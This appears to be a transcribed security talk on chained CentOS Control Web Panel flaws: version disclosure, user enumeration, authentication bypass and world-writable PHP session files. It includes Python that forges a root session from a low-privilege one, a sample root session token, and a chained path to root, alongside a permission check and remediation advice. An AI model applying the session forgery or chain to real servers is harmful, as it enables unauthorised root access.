Bkk.js #9: Do I need to fix those stupid vulnerabilities?
1. Do I need… to fix those stupid vulnerabilities?
By i3umi3iei3ii
2. Disclaimer
" This slide is purely intended for educational and research purposes only. We do NOT want anyone to use any information from this slide to attack or do illegal things (refer to the laws in your country). Therefore, any actions and/or activities related to the materials from this repository are solely your responsibility. If you don't agree, you are not allowed to access this slide; close it immediately. "
3. Overview: things I would like to share with you today
o Server version disclosure
o Bypass Authentication
o Session in /tmp/sess_xxx
o User Enumeration
4. The software we are going to deal with
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE
36. It is not a random value
Since the 'rkey' value is not random, some input must be used to derive it. What is it?
o IP Address?
o MAC Address?
Session file /tmp/sess_xxx
40. Information we generated from the test server
Session cookie: cwpsrv-bad194011f5ad0cf609c77ad222e50d6 = 3hkhskb2coovn9bpkpuqivst42
Session file: /tmp/sess_3hkhskb2coovn9bpkpuqivst42
Session file contents (PHP session serialization):
username|s:4:"root";logged|b:1;rkey|s:16:"w4wlTtbmZvQY8UA8";token|s:36:"cwp_a5711eb95256129d3304915661c6452e";
41. Login and upload session file to /tmp
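The session file shown on slide 40 is in PHP's default `php` session serializer format (`key|<serialized value>;` repeated). The Python below is an added example, not code from the talk or from CWP: it parses that format, shows how a user holding any valid session can rewrite it into the root session that slide 41 drops into /tmp (the upload step itself is not shown here; only the file contents are), and runs the permission check the conclusion calls for against a scratch directory. The low-privilege session string `LOWPRIV_SESSION` and the two directory layouts in `demo_session_dirs` are constructed for the example; the root session contents are the ones from slide 40.

```python
import os
import re
import stat
import tempfile

# Session contents from slide 40 (a root session), used as sample input.
SAMPLE_SESSION = (
    'username|s:4:"root";logged|b:1;rkey|s:16:"w4wlTtbmZvQY8UA8";'
    'token|s:36:"cwp_a5711eb95256129d3304915661c6452e";'
)
# Constructed low-privilege session for the forging demo (not from the talk).
LOWPRIV_SESSION = 'username|s:5:"alice";logged|b:1;'


def _take(pattern, data, pos):
    """Match pattern at offset pos or raise; keeps the parser strict."""
    m = re.match(pattern, data[pos:])
    if not m:
        raise ValueError("malformed value at offset %d" % pos)
    return m


def parse_php_session(data: str) -> dict:
    """Parse PHP's 'php' session serializer format: key|value;key|value;...
    Only the scalar types seen in the CWP session are handled (s, b, i).
    String lengths come from the s:<len> prefix, so values may contain ';'."""
    fields, pos = {}, 0
    while pos < len(data):
        bar = data.index("|", pos)
        key, pos = data[pos:bar], bar + 1
        if data.startswith("s:", pos):
            m = _take(r's:(\d+):"', data, pos)
            n, start = int(m.group(1)), pos + m.end()
            value = data[start:start + n]
            if data[start + n:start + n + 2] != '";':
                raise ValueError("malformed string value for %r" % key)
            pos = start + n + 2
        elif data.startswith("b:", pos):
            m = _take(r"b:([01]);", data, pos)
            value, pos = m.group(1) == "1", pos + m.end()
        elif data.startswith("i:", pos):
            m = _take(r"i:(-?\d+);", data, pos)
            value, pos = int(m.group(1)), pos + m.end()
        else:
            raise ValueError("unsupported type for %r" % key)
        fields[key] = value
    return fields


def serialize_php_session(fields: dict) -> str:
    """Inverse of parse_php_session for the same scalar types."""
    parts = []
    for key, value in fields.items():
        if isinstance(value, bool):
            parts.append("%s|b:%d;" % (key, value))
        elif isinstance(value, int):
            parts.append("%s|i:%d;" % (key, value))
        elif isinstance(value, str):
            parts.append('%s|s:%d:"%s";' % (key, len(value.encode()), value))
        else:
            raise TypeError("unsupported value for %r" % key)
    return "".join(parts)


def forge_root_session(own_session: str) -> str:
    """Slide 41: the server trusts whatever sess_<id> file it finds in /tmp,
    so a user who can write there rewrites their own session as root and then
    presents that session ID in the cwpsrv cookie."""
    fields = parse_php_session(own_session)
    fields["username"] = "root"
    fields["logged"] = True
    return serialize_php_session(fields)


def session_dir_findings(save_path: str) -> list:
    """Conclusion, slide 45 ('directory and file permissions'): a world-writable
    save_path lets any local process create sess_* files (the sticky bit only
    blocks deleting other users' files), and session files readable by
    group/other leak the token and rkey."""
    findings = []
    if os.stat(save_path).st_mode & stat.S_IWOTH:
        findings.append("save_path is world-writable: anyone can plant sess_* files")
    for name in sorted(os.listdir(save_path)):
        if name.startswith("sess_"):
            mode = stat.S_IMODE(os.stat(os.path.join(save_path, name)).st_mode)
            if mode & 0o077:
                findings.append("%s is accessible to group/other (mode %04o)" % (name, mode))
    return findings


def demo_session_dirs() -> dict:
    """Constructed layouts: a /tmp-like save_path (1777, file 0644) versus a
    private one (0700, file 0600), which is what the conclusion asks for."""
    results = {}
    with tempfile.TemporaryDirectory() as scratch:
        for label, dir_mode, file_mode in (("tmp_like", 0o1777, 0o644),
                                           ("private", 0o700, 0o600)):
            d = os.path.join(scratch, label)
            os.mkdir(d)
            sess = os.path.join(d, "sess_3hkhskb2coovn9bpkpuqivst42")
            with open(sess, "w") as fh:
                fh.write(SAMPLE_SESSION)
            os.chmod(sess, file_mode)
            os.chmod(d, dir_mode)
            results[label] = session_dir_findings(d)
    return results


if __name__ == "__main__":
    print(parse_php_session(SAMPLE_SESSION))
    print(forge_root_session(LOWPRIV_SESSION))
    for label, findings in demo_session_dirs().items():
        print(label, findings or ["ok"])
```

The forged file only works because the application reads `username` and `logged` straight out of the session store and nothing binds the session ID in the cookie to the user who created the file; moving `session.save_path` to a directory owned by the web server user with mode 0700 closes the planting route, and `session_dir_findings` is the check to run on a deployed host.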
44. Vulnerabilities Chaining
o Server version disclosure: requires a server signature; yields the target URL
o User Enumeration: requires the target URL; yields a target username
o Bypass Authentication: requires a target username; yields an authenticated user
o Session in /tmp/sess_xxx: requires an authenticated user; yields a high-privilege user (root)
45. Conclusion
o Server version disclosure: disclose as little server information as possible
o Bypass Authentication: do not trust your client
o Session in /tmp/sess_xxx: set directory and file permissions correctly
o User Enumeration: keep the response message the same
o Hash != Encode != Encrypt
o Do not send sensitive data through the URL